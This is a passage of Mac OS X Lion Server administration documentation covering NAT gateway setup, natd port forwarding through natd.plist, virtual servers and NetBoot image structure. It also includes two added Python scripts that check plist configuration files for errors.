You must locate the NAT gateway on a Lion Server computer with at least two network interfaces: one to connect to the Internet (the WAN port), and one to connect to your private network segment (the LAN port).

Decide how NAT LAN clients get IP addresses
You can assign your own static IP addresses in the approved ranges for private LANs or you can use Lion Server's DHCP feature to assign addresses for you.

Configure the gateway's network settings
You assign your public IP address to the WAN port and you assign your internal gateway's address to the LAN port.

Enable NAT service
Before configuring NAT service, you must turn NAT on. See Enable NAT service.

Configure NAT settings
Use the NAT settings to set the network interface. See Configure NAT service.

Configure port forwarding settings
Use the Terminal application to direct incoming traffic to your NAT network to a specific IP address behind the NAT gateway. See Configure port forwarding.

Start NAT service
After you configure NAT, start the service to make it available. See Start or stop NAT service.

Start Firewall service
For NAT service to operate, you must enable NAT service and Firewall service. See Enable firewall administration.

(Conditional) Configure and start DHCP service
If clients have their addresses dynamically assigned, configure DHCP and start it now. See DHCP setup overview.


Start or stop NAT service


You use Server Admin to start and stop NAT service on your default network interface. Starting NAT service does not start DHCP on the NAT interface, so you must manage LAN addressing separately. Starting NAT service is not the same as configuring a network segment as a NAT LAN. For NAT service to operate, you must enable NAT service and Firewall service. For more information, see Enable firewall administration.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NAT.
4. Click the Start NAT button below the Servers list. When the service is running, the Stop NAT button is available.


NAT command-line settings


To manage NAT service, use the following commands with the serveradmin tool.

Command (nat:command=)   Description
getLogPaths              Find the location of the log used by NAT service.
updateNATRuleInIpfw      Update the firewall rules defined in the ipfilter service to reflect changes in NAT settings.
writeSettings            Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service must be restarted.


NAT service settings


To change settings for NAT service, use the following parameters with the serveradmin tool. The descriptions paraphrase the natd(8) option of the same name; see the natd man page for the full text.

Parameter (nat:)    Values           Default   Description
deny_incoming       yes|no           no        Drop incoming packets that match no existing translation entry and no redirect.
log_denied          yes|no           no        Log the packets dropped by deny_incoming to syslog.
clamp_mss           yes|no           yes       Clamp the TCP maximum segment size of translated connections (MSS clamping).
reverse             yes|no           no        Reverse the operation of natd (rarely needed; see natd(8)).
log                 yes|no           yes       Log aliasing statistics to /var/log/alias.log.
proxy_only          yes|no           no        Perform transparent proxying only; do not translate addresses.
dynamic             yes|no           yes       Watch the interface for address changes and re-alias when the WAN address changes.
use_sockets         yes|no           yes       Allocate a local socket for FTP data and IRC DCC redirects so their ports cannot collide with local services.
interface           interface name   en0       The external (WAN) interface whose address natd uses as the alias address.
unregistered_only   yes|no           no        Translate only packets whose source is a private (RFC 1918) address.
same_ports          yes|no           yes       Try to keep the original source port number when translating.

With deny_incoming and log_denied both set to yes, natd drops and logs inbound packets that belong to no established translation and match no redirect, which is useful evidence when a port forward does not behave as expected.

Network infrastructure services > NAT > Configure NAT

Enable NAT service

Before you can configure NAT settings, you must enable NAT service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Select the NAT checkbox.
5. Click Save.


Configure NAT service


You use Server Admin to indicate which network interface is connected to the Internet or other external network. Configuring NAT service is not the same as configuring a network segment as a NAT LAN.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NAT.
4. Click Settings.
5. Select IP Forwarding and Network Address Translation (NAT).
6. From the External network interface pop-up menu, choose the network interface that connects to the Internet or external network.
7. Click Save.


Configure port forwarding


You can direct traffic coming in to your NAT network to a specific IP address behind the NAT gateway. This is called port forwarding. Port forwarding lets you set up computers on the internal network that handle incoming connections without exposing other computers to outside connections. For example, you could set up a web server behind NAT service and forward incoming TCP connection requests on port 80 to the designated web server. You can't forward the same port to multiple computers, but you can forward many ports to one computer. Every forwarded port is a service reachable from the Internet, so forward only the ports the internal host actually serves and open the matching ports in the firewall.

Enabling port forwarding requires the use of the Terminal application and administrator access to root privileges through sudo. You must also create a plist file. The contents of the plist file are used to generate /etc/nat/natd.conf.apple, which is passed to the NAT daemon when it is started. Do not try to edit /etc/nat/natd.conf.apple directly. If you use a plist editor instead of a command-line text editor, alter the following procedure to suit.

To forward port traffic:

1. If the file /etc/nat/natd.plist doesn't exist, make a copy of the default NAT daemon plist:
   $ sudo cp /etc/nat/natd.plist.default /etc/nat/natd.plist
2. Using a Terminal editor, add the following block of XML text to /etc/nat/natd.plist before the two lines at the end of the file (</dict> and </plist>), substituting your settings where indicated:
   <key>redirect_port</key>
   <array>
       <dict>
           <key>proto</key>
           <string>tcp or udp</string>
           <key>targetIP</key>
           <string>LAN_ip</string>
           <key>targetPortRange</key>
           <string>LAN_port_range</string>
           <key>aliasIP</key>
           <string>WAN_ip</string>
           <key>aliasPortRange</key>
           <string>WAN_port_range</string>
       </dict>
   </array>
3. Save your file changes.
4. Enter the following commands in Terminal:
   $ sudo serveradmin stop nat
   $ sudo serveradmin start nat
5. Verify that your changes remain by inspecting the /etc/nat/natd.conf.apple file. Your additions, except for comments and those settings that Server Admin can change, are preserved by the server configuration tools (Server Admin, Gateway Setup Assistant, and serveradmin).
6. Configure NAT service in Server Admin as needed. For more information, see Configure NAT service.
7. Click Save.
8. Start NAT service.


Port forwarding examples


You can forward ports to an IP address. The ports on the WAN side do not need to be the same as the ports on the LAN side, but they must correspond. For example, if you forward 10 consecutive ports from the WAN side, you must forward them to 10 consecutive ports on the LAN side, but they don't need to be the same 10.

Single port forwarding

This example shows the setting to forward TCP port 80 (web service) connections on the WAN address 17.128.128.128 to TCP port 80 (web service) on the private LAN address 192.168.1.1. Add the following to the /etc/nat/natd.plist file:

   <key>redirect_port</key>
   <array>
     <dict>
       <key>proto</key>
       <string>tcp</string>
       <key>targetIP</key>
       <string>192.168.1.1</string>
       <key>targetPortRange</key>
       <string>80</string>
       <key>aliasIP</key>
       <string>17.128.128.128</string>
       <key>aliasPortRange</key>
       <string>80</string>
     </dict>
   </array>

Multiple port forwarding

This example shows the setting to forward TCP and UDP ports 600-1023 (NetInfo, full range) connections on the WAN address 17.128.128.128 to the corresponding ports on the private LAN address 192.168.1.1. Both rules go in the same redirect_port array, one dict per protocol. Add the following to the /etc/nat/natd.plist file:

   <key>redirect_port</key>
   <array>
     <dict>
       <key>proto</key>
       <string>tcp</string>
       <key>targetIP</key>
       <string>192.168.1.1</string>
       <key>targetPortRange</key>
       <string>600-1023</string>
       <key>aliasIP</key>
       <string>17.128.128.128</string>
       <key>aliasPortRange</key>
       <string>600-1023</string>
     </dict>
     <dict>
       <key>proto</key>
       <string>udp</string>
       <key>targetIP</key>
       <string>192.168.1.1</string>
       <key>targetPortRange</key>
       <string>600-1023</string>
       <key>aliasIP</key>
       <string>17.128.128.128</string>
       <key>aliasPortRange</key>
       <string>600-1023</string>
     </dict>
   </array>

Testing port forwarding rules

After you configure port forwarding rules, you can test them by accessing the service from the public IP address of your NAT router. If you successfully access the service, you have properly configured and tested your port forwarding rule. For example, if you have a website hosted on a computer with the private IP address 192.168.1.10, and your NAT router has a public IP address of 219.156.13.13 and a port forwarding rule that forwards port 80 to IP address 192.168.1.10, you would access the website by entering the public IP address (http://219.156.13.13) into your web browser. If your port forwarding rules are correct, your request is forwarded to the computer that is hosting the website (192.168.1.10).
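Because natd.plist is hand-edited and natd.conf.apple is regenerated from it, a mistake in a redirect_port rule is easy to miss until a service is unreachable (or reachable where it should not be). The following script, an added example that is not part of the Apple manual and not a Lion Server tool, parses a constructed natd.plist with the standard plistlib module and checks the rules against the constraints stated in this section: proto is tcp or udp, WAN and LAN port ranges are the same size, a WAN port is never forwarded to two different LAN hosts, and the target is a private address. The sample data deliberately contains a WAN range of 60-1023 paired with a LAN range of 600-1023 so that the size check has something to report.

```python
import ipaddress
import plistlib

# Constructed /etc/nat/natd.plist fragment (sample data, not from any real server).
# The second rule intentionally pairs WAN range 60-1023 with LAN range 600-1023,
# so the ranges do not correspond and the checker should flag it.
SAMPLE_NATD_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>redirect_port</key>
  <array>
    <dict>
      <key>proto</key><string>tcp</string>
      <key>targetIP</key><string>192.168.1.1</string>
      <key>targetPortRange</key><string>80</string>
      <key>aliasIP</key><string>17.128.128.128</string>
      <key>aliasPortRange</key><string>80</string>
    </dict>
    <dict>
      <key>proto</key><string>udp</string>
      <key>targetIP</key><string>192.168.1.1</string>
      <key>targetPortRange</key><string>600-1023</string>
      <key>aliasIP</key><string>17.128.128.128</string>
      <key>aliasPortRange</key><string>60-1023</string>
    </dict>
  </array>
</dict>
</plist>
"""


def parse_port_range(text):
    """Turn "80" or "600-1023" into (low, high); reject malformed or out-of-order ranges."""
    parts = text.split("-")
    if len(parts) == 1:
        low = high = int(parts[0])
    elif len(parts) == 2:
        low, high = int(parts[0]), int(parts[1])
    else:
        raise ValueError(f"malformed port range {text!r}")
    if not 1 <= low <= high <= 65535:
        raise ValueError(f"port range {text!r} is out of order or outside 1-65535")
    return low, high


def check_rules(rules):
    """Check a list of redirect_port dicts; return human-readable problems (empty list = OK)."""
    problems = []
    claimed = {}  # (proto, WAN address, WAN port) -> LAN address already receiving it
    for i, rule in enumerate(rules):
        where = f"rule {i}"
        proto = rule.get("proto")
        if proto not in ("tcp", "udp"):
            problems.append(f"{where}: proto must be tcp or udp, got {proto!r}")
            continue
        try:
            target = ipaddress.ip_address(rule["targetIP"])
            alias = ipaddress.ip_address(rule["aliasIP"])
            wan_low, wan_high = parse_port_range(rule["aliasPortRange"])
            lan_low, lan_high = parse_port_range(rule["targetPortRange"])
        except KeyError as exc:
            problems.append(f"{where}: missing key {exc}")
            continue
        except ValueError as exc:
            problems.append(f"{where}: {exc}")
            continue
        # Forwarding to a public address would send traffic back out the WAN side.
        if not target.is_private:
            problems.append(f"{where}: targetIP {target} is not a private LAN address")
        # WAN and LAN ranges need not be identical, but they must be the same size.
        if wan_high - wan_low != lan_high - lan_low:
            problems.append(f"{where}: WAN range {wan_low}-{wan_high} and LAN range "
                            f"{lan_low}-{lan_high} differ in size")
        # The same WAN port cannot be forwarded to two different computers.
        for port in range(wan_low, wan_high + 1):
            key = (proto, str(alias), port)
            if claimed.get(key, str(target)) != str(target):
                problems.append(f"{where}: {proto} port {port} on {alias} is already "
                                f"forwarded to {claimed[key]}")
                break
            claimed[key] = str(target)
    return problems


def check_natd_plist(plist_bytes):
    """Parse a natd.plist and check its redirect_port rules."""
    conf = plistlib.loads(plist_bytes)
    return check_rules(conf.get("redirect_port", []))


if __name__ == "__main__":
    for line in check_natd_plist(SAMPLE_NATD_PLIST) or ["no problems found"]:
        print(line)
```

Run it against the real file with sudo cat /etc/nat/natd.plist piped into the script after each edit, before restarting NAT service.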


Create a gateway without NAT


You can use a computer as a gateway between network segments without translating IP addresses between public and private ranges. This is called IP address forwarding. Lion Server supports IP address forwarding, which can be configured using Server Admin.

You can have various network configurations that would use a gateway without NAT. For example, a server might be translating private IP addresses to public addresses using NAT, but your Lion Server gateway might be routing information between private address subnets. Likewise, you might want to run a firewall between network segments in your own LAN. Any condition where you want to route network traffic through the server without masquerading IP addresses is a condition that involves IP address forwarding.

The steps for creating a gateway for address forwarding are the same as those for creating a NAT LAN. This means that network ports must be properly configured and that Firewall service must be enabled.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NAT.
4. Click Settings.
5. Select IP Forwarding only.
6. Click Save.


Use serveradmin to configure NAT service


To configure NAT service:
$ sudo serveradmin settings
nat:enable_natportmap = value
nat:interface = value
Control-D

To view all settings:
$ sudo serveradmin settings nat

Parameter           Description
enable_natportmap   yes|no. Default = yes
interface           The network port. Default = "en0"

For more information about command-line parameters for NAT, see NAT service settings. For information about serveradmin, see its man page.


Use serveradmin to start and stop NAT service

You use serveradmin to start and stop NAT service on your default network interface.

To start NAT service:
$ sudo serveradmin start nat

To stop NAT service:
$ sudo serveradmin stop nat

For information about serveradmin, see its man page.


Use serveradmin to view NAT status overview


You can use serveradmin to view the NAT status overview to see if the service is running and how many protocol links are active.

To view the NAT status overview:
$ sudo serveradmin status nat

To see the detailed NAT status overview:
$ sudo serveradmin fullstatus nat

For information about serveradmin, see its man page.

Monitor NAT

View the NAT service log and log path


To view the contents of the NAT service log or to view log paths, use tail or another file listing tool.

To view the latest entries in the log:
$ tail log-file

To view the log path:
$ sudo serveradmin command nat:command = getLogPaths

The computer responds with the following output:
nat:natLog = nat-log

Value     Description
nat-log   The location of the NAT service log. Default = /var/log/alias.log

For more information about NAT commands, see NAT service settings. For information about tail and cat, see their man pages.


View the NAT status overview


The NAT status overview lets you see if the service is running and how many protocol links are active.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NAT.
4. Click Overview to see whether the service is running, when it started, and the number of TCP, UDP, and ICMP links.

Common NAT tasks

Link a LAN to the Internet through one IP address


To link a LAN, you need a Mac server with two network interfaces: one to connect to the Internet and one to connect to your private network. The steps below use the following configuration as an example:

Ethernet interface names and functions: Ethernet Built-in (connected to Internet), PCI Ethernet Slot 1 (connected to internal network)
Internet or public IP address: 17.254.0.3 (example only; your IP number is provided by your ISP)
Internet or public DNS IP address: 17.254.1.6 (example only; your IP number is provided by your ISP)
Private network IP address range and netmask: 192.168.0.2–192.168.0.254 (also expressed as 192.168.0.0/24 or 192.168.0.0:255.255.255.0)
Server's private network IP address: 192.168.0.1
LAN client IP address settings: Configure IPv4 Using DHCP

This last setting is not required, because NAT can be used with static IP addresses instead of DHCP. However, configuring this setting makes it easier to configure computers.

Internet-enabled games allow multiple players to connect online over a LAN. This is known as a LAN party. Setting up a LAN party is essentially the same as the process described below, with the following considerations:

Open only the ports necessary to play an Internet-enabled game. If the game is played only inside the LAN, don't open the firewall to game ports.
If you have computers joining and leaving the LAN, use DHCP for client address configuration.

1. On the gateway server, open the Network pane of System Preferences.
2. In the active Network screen, make sure the interface Built-in Ethernet is at the top of the list of interfaces; if not, drag it to the top of the list. This sets the default gateway in the routing table. The top interface is always configured for the Internet or WAN.
3. Make sure the IP address and settings for Ethernet 1 are your public address settings from your ISP. In this example they are:
   IP address: 17.254.0.3
   Netmask: 255.255.252.0
   DNS: 17.254.1.6
4. Make sure the IP address and settings for Ethernet 2 or PCI Ethernet Slot 1 are your local address settings. In this example, they are:
   IP address: 192.168.0.1
   Netmask: 255.255.255.0
   DNS: 17.254.1.6
5. If necessary, click Apply Now.
6. Open Server Admin and connect to the server.
7. Click the triangle at the left of the server. The list of services appears.
8. From the expanded Servers list, select DHCP.
9. Click Subnets and create a subnet for the internal LAN with the following configuration parameters:
   Subnet name: whatever you want
   Starting IP address: 192.168.0.2
   Ending IP address: 192.168.0.254
   Subnet mask: 255.255.255.0
   Network interface: en1
   Router: 192.168.0.1
   Lease time: whatever you want
   DNS: 17.254.1.6
   For detailed information about configuring DHCP, see Create DHCP subnets.
10. To start DHCP service, click the Start DHCP button below the Servers list.
11. In Server Admin, choose NAT from the expanded Servers list.
12. Configure NAT using the following setting:
   External network interface: en0
13. If necessary, click Save.
14. To start NAT service, click the Start NAT button below the Servers list.
15. In Server Admin, choose Firewall from the expanded Servers list.
16. Create firewall rules to permit access to and from your private network. For example, create an IP address group named Private LAN for the addresses 192.168.0.0/16. For more information, see Create an address group.
17. To start Firewall service, click the Start Firewall button below the Servers list.
18. Start any services you want the private LAN to access (web, SSH, file sharing, and so on) using the Private LAN group.
19. Start any services you want the Internet to access on your private LAN (web, SSH, file sharing, and so on) using the any address group.
20. Click Save.


Set up virtual servers


A virtual server is a gateway server that sends services behind a NAT firewall to real servers on a port-by-port basis. For example, suppose you have a NAT gateway named domain.example.com with an address of 17.100.0.1 that is set to forward web traffic (port 80) to 10.0.0.5 (port 80) behind the firewall and that sends packet requests for ssh traffic (port 22) to 10.0.0.15 (port 22). In this example, the NAT gateway is not really serving the web content. The server at 10.0.0.5 is, but it is invisible to the clients browsing the web site. Viewed from the Internet you have one server, but viewed from behind the NAT barrier, you have as many or as few as you need. You can use this setup for load balancing or as an organizational scheme for the network's topography. Virtual servers also enable you to easily reroute network traffic to other computers on the LAN by reconfiguring the gateway.

Virtual servers require three service configurations:

NAT: NAT service must be configured with port forwarding of the virtual port.
DNS: The DNS record for the server should accept a few aliases of common services and resolve them to the same IP address.
Firewall: The firewall must permit traffic on specific ports to have access to the NAT LAN.

In this example, you set up a NAT gateway and route two domain names and services to different computers behind the gateway firewall. Assume the following configuration details:

Ethernet interface names and functions: Ethernet Built-in (connected to Internet), PCI Ethernet Slot 1 (connected to internal network)
Internet or public IP address: 17.100.0.1 (example only; your IP number and netmask information will be provided by your ISP)
Private network IP address range and netmask: 192.168.0.0–192.168.0.255 (also expressed as 192.168.0.0/24 or 192.168.0.0:255.255.255.0)
Gateway server's private network IP address: 192.168.0.1
Web server's private network IP address: 192.168.0.2
Mail server's private network IP address: 192.168.0.3
Web and mail servers' IP address settings: Configure IPv4 Using DHCP

This last setting is not required, because NAT can be used with static IP addresses instead of DHCP. However, configuring this setting makes it easier to configure computers.

When the procedure is complete, all web traffic to www.example.com is forwarded to the internal server at 192.168.0.2, and incoming mail traffic sent to mail.example.com is delivered to the internal server at 192.168.0.3. To change the servers behind the NAT (for example, to perform a hardware upgrade), change the DHCP static IP address mapping to the Ethernet addresses of the new servers. The new servers are assigned the existing internal IP addresses designated for web and mail, and the gateway forwards the traffic to the new servers seamlessly.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Subnets and create an address group for the internal LAN with the following configuration parameters:
   Subnet name: whatever you want
   Starting IP address: 192.168.0.2
   Ending IP address: 192.168.0.254
   Subnet mask: 255.255.255.0
   Network interface: en1
   Router: 192.168.0.1
   Lease time: whatever you want
   DNS: provided by ISP
   Static mapping (web): web server's Ethernet address mapped to 192.168.0.2
   Static mapping (mail): mail server's Ethernet address mapped to 192.168.0.3
   For more information, see Create DHCP subnets and Use DHCP to assign static IP addresses.
5. To start DHCP service, click the Start DHCP button (below the Servers list).
6. In Server Admin, choose NAT from the expanded Servers list.
7. Configure NAT using the following settings:
   External network interface: en0
   Port forwarding: TCP port 80 (web) to 192.168.0.2
   Port forwarding: TCP port 25 (mail) to 192.168.0.3
   For more information about configuring port forwards, see Configure port forwarding.
8. Click Save.
9. To start NAT service, click the Start NAT button below the Servers list.
10. In Server Admin, choose Firewall from the expanded Servers list.
11. Create Firewall rules to permit access to your private network. For more information, see Create an address group.
12. Enable the two services you want the Internet to access on your private LAN (web and SMTP mail) using the any address group.
13. Click Save.
14. To start Firewall service, click the Start Firewall button (below the Servers list).
15. Contact your DNS provider (usually your ISP) to add two aliases to your gateway server's DNS record. Request an A record with the name www.example.com to the IP address 17.100.0.1. Request an MX record with the name mail.example.com to the same IP address. These records are in addition to existing A and CNAME records for your domain.

NetBoot

About NetBoot service


NetBoot service is built upon protocols, files, and folder structures that are described below.

The NetBoot, NetInstall, and NetRestore features of Mac OS X offer you alternatives for managing the operating system and application software that your Macintosh clients (or even other servers) require to start and do their work. Instead of going from computer to computer to install operating system and application software from CDs, you can prepare an installation image that installs on each computer when it starts up. You can also choose to not install software and have client computers start up (or boot) from an image stored on the server. (In some cases, clients don't even need their own hard disk.)

Using NetBoot and NetInstall, your client computers can start from a standardized Mac OS configuration suited to specific tasks. Because the client computers start from the same image, you can quickly update the operating system for users by updating a single boot image.

NetBoot requires a boot image. NetInstall requires an installation image. A boot image (.dmg file) is a file that looks and acts like a mountable disk or volume. NetBoot images contain the system software needed to act as a startup disk for client computers over the network. An installation image (.nbi folder) is an image that starts up the client computer long enough to install software from the image. The client can then start up from its own hard disk. Boot images and installation images are disk images. The main difference is that a .dmg file is a proper disk image and a .nbi folder is a bootable network volume (which contains a .dmg disk image file). Disk images are files that behave like disk volumes.

You can set up multiple NetBoot or NetInstall images to suit the needs of groups of clients, or you can provide copies of the same image on multiple NetBoot servers to distribute the client startup load. You can also use a NetRestore image to quickly restore a volume.

NetBoot service can be used with NetBoot and NetInstall images along with Mac OS X client management services to provide a personalized work environment for each user.

Disk Images

The disk images contain the system software and applications used over the network by client computers. These tools can be installed on a client computer with the Server Administration Tools image. The name of a disk image file typically ends in .img or .dmg. Disk Utility, part of Mac OS X Lion, can mount disk image files as volumes on the desktop.

You use System Image Utility to create Mac OS X Lion NetBoot or NetInstall images, using a Mac OS X Lion installation volume or an existing system volume as the source. For information about creating images, see System Image Utility help.

NetBoot Share Points

NetBoot service sets up share points to make images and shadow files available to clients. Shadow files are used for NetBoot clients that don't use their local hard disks to write out data when booted.

NetBoot service creates share points for storing NetBoot and NetInstall images in /Library/NetBoot/ on each volume you enable and names them NetBootSPn, where n is 0 for the first share point and increases by 1 for each extra share point. For example, if you decide to store images on three server disks, NetBoot service sets up three share points named NetBootSP0, NetBootSP1, and NetBootSP2.

The share points for client shadow files are also created in /Library/NetBoot/ and are named NetBootClientsn, where n is the share point number. You can create and enable NetBootSPn and NetBootClientsn share points on other server volumes using the NetBoot Service General settings in Server Admin.

WARNING: Don't rename a NetBoot share point or the volume it resides on. Don't stop sharing a NetBoot share point unless you first deselect the share point for images and shadow files in Server Admin.

Use NetBoot and NetInstall Images on Other Servers

You can also specify the path of a NetBoot image residing on a different NFS server. When creating image files, you can specify which server the image will reside on. See Use images stored on remote servers.

Client Information File

NetBoot service gathers information about a client the first time a client selects a NetBoot or NetInstall volume to start from in the Startup Disk preference. NetBoot service stores this information in the /var/db/bsdpd_clients file.

Shadow Files

Many clients can read from the same NetBoot image, but when a client must write back to its startup volume (such as print jobs and other temporary files), NetBoot service redirects the written data to the client's shadow files, which are separate from regular system and application software. Shadow files preserve the unique identity of each client while it is running from a NetBoot image. NetBoot service transparently maintains changed user data in shadow files while reading unchanged data from the shared system image.

Shadow files are recreated at startup, so changes made to a user's startup volume are lost at restart. For example, if a user saves a document to the startup volume, after a restart that document is gone. This behavior preserves the condition of the environment the administrator set up. Therefore users must have accounts on a file server on the network to save documents.

Balance the Shadow File Load

NetBoot service creates an AFP share point on each server volume you specify (see Choose where shadow files are stored) and distributes client shadow files across them as a way of balancing the load for NetBoot clients. There is no performance gain if the volumes are partitions on the same disk. See Distribute shadow files.

Allocation of Shadow Files for Mac OS X Lion NetBoot Clients

When a client computer starts from a Mac OS X Lion NetBoot image, it creates shadow files on a server NetBootClientsn share point or, if no share point is available, on a drive local to the client. For information about changing this behavior, see Choose where shadow files are stored.

NetBoot Image Folder

When you create a Mac OS X Lion NetBoot image with System Image Utility, the utility creates a NetBoot image folder whose name ends with .nbi and stores in it the NetBoot image with other files (see the following table) required to start a client computer over the network.
File                 Description
booter               Startup file that the firmware uses to begin the startup process
mach.macosx          UNIX kernel
mach.macosx.mkext    Drivers
System.dmg           Startup image file (can include application software)
NBImageInfo.plist    Property list file

System Image Utility stores the folder whose name ends with .nbi on the NetBoot server in /Library/NetBoot/NetBootSPn/image.nbi (where n is the volume number and image is the name of the image). You can save directly to this folder or you can create the image elsewhere (even on another computer) and copy it to the /Library/NetBoot/NetBootSPn folder later.

Files for PowerPC-based Macintosh computers are stored in the ppc folder for Mac OS X Server v10.5 images, while previous images might store PowerPC files in the root of the .nbi folder. Files for Intel-based Macintosh computers are stored in the i386 folder. Mac OS X Server v10.6 and later do not support imaging of PowerPC-based computers.

You use System Image Utility to set up NetBoot image folders. The utility lets you:

Name the image
Choose the image type (NetBoot or NetInstall)
Provide an image ID
Choose the default language
Choose the computer models the image supports
Create unique sharing names
Specify a default user name and password
Enable automatic installation for installation images
Add package or preinstalled applications

For information about creating images, see Create NetBoot images.

Property List File

The property list file NBImageInfo.plist stores image properties. The following table gives more information about the property list file for Mac OS X Lion image files.
Property           Type      Description
Architectures      Array     An array of strings of the architectures the image supports.
BootFile           String    Name of boot file: booter.
Index              Integer   1–4095 indicates a local image unique to the server. 4096–65535 is a duplicate, identical image stored on multiple servers for load balancing.
IsDefault          Boolean   True specifies this image file as the default boot image on the subnet.
IsEnabled          Boolean   Sets whether the image is available to NetBoot (or Network Image) clients.
IsInstall          Boolean   True specifies a Network Install image; False specifies a NetBoot image.
Name               String    Name of the image as it appears in the Mac OS X Lion Preferences pane.
RootPath           String    Specifies the path to the disk image on the server, or the path to an image on another server. See Use images stored on remote servers.
Type               String    NFS or HTTP.
SupportsDiskless   Boolean   True directs the NetBoot server to allocate space for the shadow files needed by diskless clients.
Description        String    Text describing the image.
Language           String    A code specifying the language to be used while starting from the image.

Initial values in NBImageInfo.plist are set by System Image Utility, and you usually don't need to change the property list file directly. Some values are set by Server Admin. If you must edit a property list file, you can use TextEdit or Property List Editor, found in the Utilities folder on the Server Administration Tools image.

Boot Server Discovery Protocol (BSDP)

NetBoot service uses an Apple-developed protocol based on DHCP known as Boot Server Discovery Protocol (BSDP). This protocol provides a way of discovering NetBoot servers on a network. NetBoot clients obtain their IP information from a DHCP server and their NetBoot information from BSDP. BSDP offers built-in support for load balancing. See Performance and load balancing.

BootP Server

NetBoot service uses a BootP server (bootpd) to provide necessary information to client computers when they try to start from an image on the server. If BootP clients on your network request an IP address from the NetBoot BootP server, this request fails because the NetBoot BootP server doesn't have addresses to offer. To prevent the NetBoot BootP server from responding to requests for IP addresses, use the dscl command-line tool to open the local folder on the NetBoot server and add a key named bootp_enabled with no value to the /config/dhcp/ folder.

Boot Files

When you create a Mac OS X Lion NetBoot image with System Image Utility, the utility generates the following boot files and stores them on the NetBoot server in /Library/NetBoot/NetBootSPn/image.nbi (where n is the volume number and image is the name of the image):

booter
mach.macosx
mach.macosx.mkext

Note: If you turn on NetBoot service when installing Mac OS X Lion, the installer creates the NetBootSP0 share point on the server boot volume. Otherwise, you can set up NetBootSPn share points by choosing where to store NetBoot images from the list of volumes in the General pane of NetBoot Service settings in Server Admin.
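When NBImageInfo.plist is edited by hand, the checks worth running are exactly the ones the table above implies: every property has the listed type, Index falls in the local (1–4095) or duplicated (4096–65535) range, Type is NFS or HTTP, and BootFile names the booter. The script below, an added example that is neither Apple's code nor part of System Image Utility, applies those checks to a constructed NBImageInfo.plist with the standard plistlib module. The final check (a NetInstall image that is also the subnet default) is this example's own sanity check, motivated by the data-loss warning in the NetInstall section, not a rule stated in the table.

```python
import plistlib

# Constructed NBImageInfo.plist for a hypothetical Lion NetInstall image
# (sample data for this example; not a file from any real server).
SAMPLE_NBIMAGEINFO = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Architectures</key><array><string>i386</string></array>
  <key>BootFile</key><string>booter</string>
  <key>Index</key><integer>4097</integer>
  <key>IsDefault</key><false/>
  <key>IsEnabled</key><true/>
  <key>IsInstall</key><true/>
  <key>Name</key><string>Lion NetInstall</string>
  <key>RootPath</key><string>System.dmg</string>
  <key>Type</key><string>NFS</string>
  <key>SupportsDiskless</key><false/>
  <key>Description</key><string>Automated Lion install image</string>
  <key>Language</key><string>Default</string>
</dict>
</plist>
"""

# Property -> Python type, taken from the NBImageInfo.plist table above.
EXPECTED_TYPES = {
    "Architectures": list, "BootFile": str, "Index": int,
    "IsDefault": bool, "IsEnabled": bool, "IsInstall": bool,
    "Name": str, "RootPath": str, "Type": str,
    "SupportsDiskless": bool, "Description": str, "Language": str,
}


def image_scope(index):
    """Classify an image Index as the table does: local (1-4095) or duplicate (4096-65535)."""
    if 1 <= index <= 4095:
        return "local"
    if 4096 <= index <= 65535:
        return "duplicate"
    raise ValueError(f"Index {index} is outside 1-65535")


def check_nbimageinfo(plist_bytes):
    """Return a list of problems found in an NBImageInfo.plist (empty list = consistent)."""
    info = plistlib.loads(plist_bytes)
    problems = []
    for key, typ in EXPECTED_TYPES.items():
        if key not in info:
            problems.append(f"missing key {key}")
        # bool is a subclass of int in Python, so reject True/False where an Integer is expected
        elif not isinstance(info[key], typ) or (typ is int and isinstance(info[key], bool)):
            problems.append(f"{key} should be of type {typ.__name__}")
    if problems:
        return problems  # value checks below assume the keys and types are right
    if not info["Architectures"] or not all(isinstance(a, str) for a in info["Architectures"]):
        problems.append("Architectures must be a non-empty array of strings")
    try:
        image_scope(info["Index"])
    except ValueError as exc:
        problems.append(str(exc))
    if info["Type"] not in ("NFS", "HTTP"):
        problems.append(f"Type must be NFS or HTTP, got {info['Type']!r}")
    if info["BootFile"] != "booter":
        problems.append(f"BootFile should be booter, got {info['BootFile']!r}")
    # Example's own check (not from the table): a NetInstall image that is the subnet
    # default will be offered to every client that NetBoots, so it deserves review.
    if info["IsInstall"] and info["IsDefault"]:
        problems.append("IsInstall image is also IsDefault: review before enabling")
    return problems


if __name__ == "__main__":
    for line in check_nbimageinfo(SAMPLE_NBIMAGEINFO) or ["no problems found"]:
        print(line)
```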
Trivial File Transfer Protocol (TFTP)

NetBoot service uses Trivial File Transfer Protocol (TFTP) to send boot files from the server to the client. When you start a NetBoot client, the client sends a request for startup software. The NetBoot server then delivers the booter file to the client using the TFTP default port 69. Client computers access the startup software on the NetBoot server from the location where the image was saved. These files are typically stored in the /private/tftpboot/NetBoot/NetBootSPn/ folder. This path is a symbolic link to /Library/NetBoot/NetBootSPn/image.nbi (where n is the volume number and image is the name of the image).

Using Images Stored on Other Servers

You can store Mac OS X Lion NetBoot or NetInstall images on NFS servers other than the NetBoot server. For more information, see Use images stored on remote servers.

Security

